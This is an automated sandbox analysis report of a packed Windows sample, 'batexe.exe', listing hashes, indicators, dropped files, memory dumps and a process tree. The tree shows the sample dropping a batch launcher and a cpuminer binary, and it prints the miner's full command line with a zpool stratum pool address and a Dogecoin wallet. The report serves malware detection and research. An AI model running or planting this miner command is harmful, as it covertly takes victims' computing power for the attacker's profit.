73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72

Analysis

max time kernel
296s
max time network
303s
platform
windows10-1703_x64
resource
win10-20240214-ja
resource tags

arch:x64arch:x86image:win10-20240214-jalocale:ja-jpos:windows10-1703-x64systemwindows
submitted
18/02/2024, 09:08

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

batexe.exe
Size

9.4MB
MD5

cdc9eacffc6d2bf43153815043064427
SHA1

d05101f265f6ea87e18793ab0071f5c99edf363f
SHA256

73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72
SHA512

fc6945957e160bf7059c936c329aae438e6c1521e5e43a8434f58058230d89e818eb6ff80331a4b952dbb600b8cc134ecba54e5641bf549723c98f85e993fde6
SSDEEP

196608:ERAefrn9wcsTRAJgwusnWpV3h9XxSeEGaT+TKkGzySdUkI56kBIyky:E5Tn9YVwdnWLXxkvLlzkuv

Score

7^/10

upx

Malware Config

Signatures

Executes dropped EXE 2 IoCs

pid	Process
4652	b2e.exe
3956	cpuminer-sse2.exe

Loads dropped DLL 5 IoCs

pid	Process
3956	cpuminer-sse2.exe
3956	cpuminer-sse2.exe
3956	cpuminer-sse2.exe
3956	cpuminer-sse2.exe
3956	cpuminer-sse2.exe

UPX packed file 1 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/memory/1552-6-0x0000000000400000-0x000000000393A000-memory.dmp	upx

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious use of WriteProcessMemory 8 IoCs

description	pid	Process	procid_target
PID 1552 wrote to memory of 4652	1552	batexe.exe	73
PID 1552 wrote to memory of 4652	1552	batexe.exe	73
PID 1552 wrote to memory of 4652	1552	batexe.exe	73
PID 4652 wrote to memory of 968	4652	b2e.exe	74
PID 4652 wrote to memory of 968	4652	b2e.exe	74
PID 4652 wrote to memory of 968	4652	b2e.exe	74
PID 968 wrote to memory of 3956	968	cmd.exe	77
PID 968 wrote to memory of 3956	968	cmd.exe	77

C:\Users\Admin\AppData\Local\Temp\batexe.exe
"C:\Users\Admin\AppData\Local\Temp\batexe.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:1552
- C:\Users\Admin\AppData\Local\Temp\27C7.tmp\b2e.exe
  "C:\Users\Admin\AppData\Local\Temp\27C7.tmp\b2e.exe" C:\Users\Admin\AppData\Local\Temp\27C7.tmp\b2e.exe C:\Users\Admin\AppData\Local\Temp "C:\Users\Admin\AppData\Local\Temp\batexe.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:4652
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\2F0A.tmp\batchfile.bat" "
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:968
  - - C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe
      cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.sea.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 3
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:3956

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\27C7.tmp\b2e.exe

Filesize
3.9MB

MD5
1b354728a944a9220df7eededfd9f8e9

SHA1
d9547f3eda300eea37b80daafd8c2715d9d73f93

SHA256
97c12b4912323d418fc9d2994c8aaf10b137ac1bbf894398f27e0069642f6844

SHA512
5ee8518d4888679cede44a076506fef21bcccd2423682338083bd62a071548e281c157cdedf676b1732ee076befcbfe52d95ff03ff42e0e70a446e45d29bb7d0

Download Submit
C:\Users\Admin\AppData\Local\Temp\27C7.tmp\b2e.exe

Filesize
3.4MB

MD5
8247aea35ac539a20a4091acb8f4061c

SHA1
ead87c6077a2664bbc9c8c6157baa3aba960f1c2

SHA256
59bd9dfc483c987482c1a3328925fb34f2ba103e6e2517a7124b19fe700e3251

SHA512
1c9d8f909ee609ae170abca13b26549d1d2d9f50b35e40b9ddd7e742098d282f7bda5191af99f39e7888724c53b41ddb8e506253abd93d356c6dc1ef94965e1e

Download Submit
C:\Users\Admin\AppData\Local\Temp\2F0A.tmp\batchfile.bat

Filesize
136B

MD5
8ea7ac72a10251ecfb42ef4a88bd330a

SHA1
c30f6af73a42c0cc89bd20fe95f9159d6f0756c5

SHA256
65e2674fc9b921a76deaf3740603359794c04e059e8937ab36eb931d65f40ec9

SHA512
a908979d588625aa24eb81238d07d88a56be5388e1265ebd2fe09889ed807aa9a4af77107e72a843c31acadbe06db0d7f6f6a3c95fb481a71e549e8eb74c2ff0

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
421KB

MD5
c2790c8743722586369cdcfafeedf9f1

SHA1
9d982c0aae258c4c2f481d67ee36281b771c24f8

SHA256
619dccab31aaee97941762bf7fa480887188b3023db0c5e81a302e75de28f88b

SHA512
8a68b26c57ea7f4704d609d08d52cd2826f60296fe1a39cad0114af8382dfa1746c36afaa1d675cc1de7cbc005b82f5a8af9fbf39cce24fe0c1f04a060df7ef0

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
523KB

MD5
9702c834acfe8df4b5f7753b3bdca87f

SHA1
b1d3ffd3810f0f43e508c213aba5b2d957e561a7

SHA256
a686ea1beed02daa7e0625dfcece8f4ee27c03d877da935dca52da57480122a2

SHA512
3c2d97115afa75b12899734f1cc1b46edecf5f0d543f454dbab4ecefc6da0ab7458a18491cbfec24a724d7208e045e85878cd0b550a3f8752116ba2c0d083074

Download Submit
C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
287KB

MD5
f5574d3fb9643ef6212f83977f99fb83

SHA1
4718dcbb26556abd62d8e678c94c8ec5a3b1858b

SHA256
edf7967a102b343bb6a71851a97639ef3eaca94a15b1b275e1c84a4564da75c6

SHA512
b495861a87f0523a235414ab260f248315f12a28cedef3ce6842f45d7c32673903112e0f28892762ade394dc7af9c4993cbcc5f0dd6ca78da69fe6b79b277324

Download Submit
C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
163KB

MD5
747d9035a1e6f97da14fc9ff8ed6e867

SHA1
97ff9bb6e2efb19f3f1b1c5689988840e8931134

SHA256
b68d36f2766f9dc0054501abef20fe466fac634df1df09de3af9d0b3da6c3a6d

SHA512
c46a996ad1c8d87bcdbc8ad42426cabed7de65bfc3f0d018ed9116bdeafa61bda1576a84ea32642440731be3db21ea095896ac19c2074db1b3e14731978b3ef2

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
185KB

MD5
642c4e5c45929c1a16b2890d83e7f69a

SHA1
5b5f85cf657677ac5ec885022ea0b1f980934b82

SHA256
e757412de799de189fc4f47d4ba5e9faa52fec73d573d11623967bde710be143

SHA512
b40c2df0bce90a128497f02d631e421e41e81c68751a7e9a5883b48e2837046a47d46ea0413d2c8a84517d049e68fbe16fef465450ba6790a7b1fef4dbf4fb91

Download Submit
C:\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
263KB

MD5
3c6e434de6540e166a5458f970cf1698

SHA1
593262edb94694a5c1e9421b442379047cac9a45

SHA256
2e2d21c0f0aea359dad30ecb49dfdc31f821f0dbd23b4aaf439a10fffe79f283

SHA512
4283f5414a67bec87ea0ffbe9f62145b315f32bd356d0c28ace56447a2188b4049dd5a9678f902380d877124c8cf83301d1e255561cd00ae51e763c52e16dc3d

Download Submit
\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
243KB

MD5
6f4be761604633ec8702e3860e2ab9a1

SHA1
5a42a9bd022d94886df9fe4d6edaa7fa07e48039

SHA256
0ef8070848c96e47d685d35ce79cb44b0169cd5527c559e25893a9ec0330c1a9

SHA512
c01ed1841bfaa1fbabe53aeac583aab14dc5091b2183fa6670c8d221d4a386538b5132f12ba247da787786bab8d9238aa59f7fd0c74893b507ac3733c14ea2b5

Download Submit
\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
206KB

MD5
590d25f03d41d64e443444919a29ede1

SHA1
3921410fc1a0d1a6b820e510392957336611be7a

SHA256
6bf4e3a426c85aaef7e8651ce211b10ea9f46704d29df5a07fdb41e8a02513a9

SHA512
b4802ae3ed49239a87377314ab70072caf85cae1e873e28fe2dae0c74fb040c012302577dc2195da6059506535b8196ac8918ff11db81d0bdfab857cc732632b

Download Submit
\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
193KB

MD5
9dc26846269bb47df31782e99371d36e

SHA1
72cd8da01d781f5cac95163b9cb5f691cd644113

SHA256
155ccdaf31378e1c83f42883a5c9f1941fce4a5655dd2ac753f11dfa6b75beea

SHA512
d8c6b79ccd6511897ff1b955e6d2122dc971673a2040ffaa8aba6c9cfdb6eb5c4a3e99c229ae99c58f35f024febd6cf4a39bf49b33cbf898461953426344a909

Download Submit
\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
268KB

MD5
367da8e5db39696f59fa6e71d451d8ef

SHA1
2e1c1dcae88666f4a87e17d7f1702a25bbce09c3

SHA256
f07da3c5e6e7d0c60317ac45ec401a29129da08086d0d28d88d95919977387c7

SHA512
15919d72e4b064b6c99b0e86a499a827216ecf3ecfc486a34dffb4571145579430fe1b7b8e6c713f7b9c8b19b0684272928e4b98b0c292b6f07c0ff2c614fbc6

Download Submit
\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
358KB

MD5
e77fea2670b12160509c45cf19a9aa24

SHA1
ee736ec5c4a46a2626f36bcef09d780e271494ae

SHA256
b0c1bf5ea2f88f393d01fa6b82415b83ab5eb58b8ddb3601a6333d4fb0791c2d

SHA512
ac3cc5c4cf1fb9e4156fa248ea8a7d321bf5c306588ee2962f6d8fe51fa207f6c2927144ae5b4dbf603a5718af1d22a624370954c8dfd17ef7470fb47bfaa349

Download Submit
memory/1552-6-0x0000000000400000-0x000000000393A000-memory.dmp

Filesize
53.2MB

Download
memory/3956-43-0x0000000061440000-0x000000006156B000-memory.dmp

Filesize
1.2MB

Download
memory/3956-56-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3956-41-0x0000000070800000-0x00000000708BC000-memory.dmp

Filesize
752KB

Download
memory/3956-101-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3956-42-0x000000005D8A0000-0x000000005D938000-memory.dmp

Filesize
608KB

Download
memory/3956-44-0x0000000001070000-0x0000000002925000-memory.dmp

Filesize
24.7MB

Download
memory/3956-96-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3956-40-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3956-61-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3956-71-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3956-81-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3956-86-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4652-50-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/4652-5-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download